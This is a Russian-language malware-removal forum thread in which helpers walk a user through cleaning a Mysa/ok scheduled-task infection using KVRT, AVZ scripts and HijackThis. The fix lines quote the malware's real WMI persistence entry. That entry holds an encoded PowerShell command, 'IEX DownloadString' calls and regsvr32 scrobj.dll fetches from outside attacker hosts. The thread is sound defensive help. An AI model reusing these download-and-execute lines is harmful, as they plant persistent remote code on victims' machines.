Решена mysa,mysa1,mysa2,mysa3,ok

Статус
В этой теме нельзя размещать новые ответы.
debufff

debufff

Новый пользователь
Сообщения
8
Реакции
0
Появились задания Mysa,Mysa1,Mysa2,Mysa3,ok в планировщике заданий когда удаляю появляются опять. Браузер при запуске открывает страницу about:blank хотя стоит новая вкладка. Сеть иногда просто пропадает. И при запуске пк через 2 минуты появляется на пол секунды cmd которая сворачивает приложения.
 
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

А после нужны логи https://safezone.cc/pravila/
 
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код: 
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','');
 QuarantineFile('c:\windows\update.exe>','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('c:\windows\debug\item.dat>','');
 QuarantineFile('c:\windows\help\lsmosee.exe>','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('C:\Users\Серго\AppData\Roaming\nssm.exe','');
 DeleteFile('C:\Users\Серго\AppData\Roaming\nssm.exe','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('c:\windows\help\lsmosee.exe>','32');
 DeleteFile('c:\windows\debug\item.dat>','32');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\update.exe>','32');
 DeleteFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','32');
 DeleteSchedulerTask('Pupdbrowser');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код: 
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код: 
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 
ошибка какая-то
.webp
 
Используйте AVZ из папки автологера, а не устаревшую версию 4.46
 
2019.10.17_quarantine_6736e374275c905c15846238569e4c23.7z
 
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код: 
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll (HKLM) (2019/10/03)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)


Что с проблемой после фикса?
 
Вроде все нормально, спасибо за помощь
 
Исправьте по возможности
Системный диск: C: ФС: [NTFS] Емкость: [37.3 Гб] Занято: [25.6 Гб] Свободно: [11.7 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3020369 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4484071 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4519976 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.5.2 v.4.5.51209 Внимание! Скачать обновления
 
Файл подкачки минимум какой выставить на диске С?
 
Оставьте размер по выбору системы, будет лучше.
 
Статус
В этой теме нельзя размещать новые ответы.

Похожие темы

VVV1971
  • Закрыта
Решена Mysa/Mysa1/Mysa2/Mysa3
3 4 5 6
Ответы
109
Просмотры
8K
akok
akok
smoked
  • Закрыта
Решена Mysa\Mysa1\Mysa2\Mysa3\ok
Ответы
18
Просмотры
3K
akok
akok
I
  • Закрыта
Решена Снова Mysa\Mysa1\Mysa2\Mysa3\ok
Ответы
12
Просмотры
3K
akok
akok
Назад
Сверху Снизу